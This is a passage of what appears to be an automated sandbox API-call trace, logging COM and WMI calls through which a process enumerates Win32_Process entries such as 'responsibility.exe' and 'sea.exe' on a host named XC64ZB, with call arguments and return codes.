puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.606] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.606] IWbemClassObject:Get (in: This=0x55185d8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cdde4*=0, plFlavor=0x23cdde8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="responsibility.exe", varVal2=0x0), pType=0x23cdde4*=8, plFlavor=0x23cdde8*=0) returned 0x0 [0264.607] SysStringByteLen (bstr="responsibility.exe") returned 0x24 [0264.607] SysStringByteLen (bstr="responsibility.exe") returned 0x24 [0264.607] IWbemClassObject:Get (in: This=0x55185d8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cdde4*=8, plFlavor=0x23cdde8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="responsibility.exe", varVal2=0x0), pType=0x23cdde4*=8, plFlavor=0x23cdde8*=0) returned 0x0 [0264.607] SysStringByteLen (bstr="responsibility.exe") returned 0x24 [0264.607] SysStringByteLen (bstr="responsibility.exe") returned 0x24 [0264.607] CoTaskMemAlloc (cb=0x4) returned 0x54ba248 [0264.607] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba248, puReturned=0x23c1fd0 | out: apObjects=0x54ba248*=0x5518908, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.609] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518908) returned 0x0 [0264.609] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.609] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.609] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.609] IUnknown:AddRef (This=0x5518908) returned 0x3 [0264.609] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.610] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.610] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551890c) returned 0x0 [0264.610] IMarshal:GetUnmarshalClass (in: This=0x551890c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.610] IUnknown:Release (This=0x551890c) returned 0x3 [0264.610] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.610] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.610] IUnknown:QueryInterface (in: This=0x5518908, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.610] IUnknown:Release (This=0x5518908) returned 0x2 [0264.610] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.610] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.610] IUnknown:QueryInterface (in: This=0x5518908, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518908) returned 0x0 [0264.610] IUnknown:AddRef (This=0x5518908) returned 0x4 [0264.610] IUnknown:Release (This=0x5518908) returned 0x3 [0264.610] IUnknown:Release (This=0x5518908) returned 0x2 [0264.610] CoTaskMemFree (pv=0x54ba248) [0264.610] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.610] IUnknown:AddRef (This=0x5518908) returned 0x3 [0264.610] IWbemClassObject:Get (in: This=0x5518908, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.610] IWbemClassObject:Get (in: This=0x5518908, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3792\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.611] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3792\"") returned 0x5e [0264.611] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3792\"") returned 0x5e [0264.611] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.611] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.611] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.611] IUnknown:Release (This=0x601a94) returned 0x1 [0264.612] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba318) returned 0x0 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba318, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.612] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba318, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514738) returned 0x0 [0264.612] WbemDefPath:IUnknown:Release (This=0x54ba318) returned 0x0 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514738) returned 0x0 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.612] WbemDefPath:IUnknown:AddRef (This=0x5514738) returned 0x3 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550e320) returned 0x0 [0264.613] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550e320, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.613] WbemDefPath:IUnknown:Release (This=0x550e320) returned 0x3 [0264.613] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.613] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.613] WbemDefPath:IUnknown:Release (This=0x5514738) returned 0x2 [0264.613] WbemDefPath:IUnknown:Release (This=0x5514738) returned 0x1 [0264.613] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.613] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.613] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514738, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514738) returned 0x0 [0264.613] WbemDefPath:IUnknown:AddRef (This=0x5514738) returned 0x3 [0264.613] WbemDefPath:IUnknown:Release (This=0x5514738) returned 0x2 [0264.613] WbemDefPath:IWbemPath:SetText (This=0x5514738, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3792\"") returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.613] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.613] IWbemClassObject:Get (in: This=0x5518908, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ce690*=0, plFlavor=0x23ce694*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sea.exe", varVal2=0x0), pType=0x23ce690*=8, plFlavor=0x23ce694*=0) returned 0x0 [0264.614] SysStringByteLen (bstr="sea.exe") returned 0xe [0264.614] SysStringByteLen (bstr="sea.exe") returned 0xe [0264.614] IWbemClassObject:Get (in: This=0x5518908, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ce690*=8, plFlavor=0x23ce694*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sea.exe", varVal2=0x0), pType=0x23ce690*=8, plFlavor=0x23ce694*=0) returned 0x0 [0264.614] SysStringByteLen (bstr="sea.exe") returned 0xe [0264.614] SysStringByteLen (bstr="sea.exe") returned 0xe [0264.614] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0264.614] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5518440, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.628] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5518440) returned 0x0 [0264.628] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.628] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.678] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.678] IUnknown:AddRef (This=0x5518440) returned 0x3 [0264.678] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.678] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.678] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5518444) returned 0x0 [0264.678] IMarshal:GetUnmarshalClass (in: This=0x5518444, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.678] IUnknown:Release (This=0x5518444) returned 0x3 [0264.678] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.678] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.678] IUnknown:QueryInterface (in: This=0x5518440, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.678] IUnknown:Release (This=0x5518440) returned 0x2 [0264.678] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.678] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.679] IUnknown:QueryInterface (in: This=0x5518440, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5518440) returned 0x0 [0264.679] IUnknown:AddRef (This=0x5518440) returned 0x4 [0264.679] IUnknown:Release (This=0x5518440) returned 0x3 [0264.679] IUnknown:Release (This=0x5518440) returned 0x2 [0264.679] CoTaskMemFree (pv=0x54ba2d8) [0264.679] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.679] IUnknown:AddRef (This=0x5518440) returned 0x3 [0264.679] IWbemClassObject:Get (in: This=0x5518440, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.679] IWbemClassObject:Get (in: This=0x5518440, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2984\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.679] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x5e [0264.679] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2984\"") returned 0x5e [0264.679] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.680] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.680] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.680] IUnknown:Release (This=0x601a94) returned 0x1 [0264.680] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.681] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515308) returned 0x0 [0264.681] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515308) returned 0x0 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.681] WbemDefPath:IUnknown:AddRef (This=0x5515308) returned 0x3 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.681] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515308, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550e4e8) returned 0x0 [0264.681] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550e4e8, 